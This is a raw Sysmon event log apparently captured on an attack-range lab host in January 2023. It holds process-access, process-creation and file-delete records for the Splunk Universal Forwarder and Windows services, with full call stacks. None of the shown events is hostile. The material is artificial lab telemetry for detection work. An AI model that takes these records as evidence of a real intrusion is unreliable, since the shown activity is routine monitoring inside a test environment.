12:20:31.611{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016085Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E40F-63C7-F801-00000000B002}3048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016084Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E40F-63C7-F801-00000000B002}3048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016083Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.612{E5A8D418-E40F-63C7-F801-00000000B002}3048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016082Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.059{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA9E1BAD397A83F614239DC7EDC269F7,SHA256=9DA0230C663F03C4EBF877D0DFA855CE5950B39FB67999C3B979158EB370F01C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016126Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.984{E5A8D418-E410-63C7-FA01-00000000B002}18323004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016125Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.817{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E410-63C7-FA01-00000000B002}1832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016124Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016123Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016122Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016121Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016120Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016119Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016118Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016117Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016116Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016115Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E410-63C7-FA01-00000000B002}1832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016114Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E410-63C7-FA01-00000000B002}1832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016113Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.814{E5A8D418-E410-63C7-FA01-00000000B002}1832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000016112Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.536{E5A8D418-E410-63C7-F901-00000000B002}32283240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016111Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E410-63C7-F901-00000000B002}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016110Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016109Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016108Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016107Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016106Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016105Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016104Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 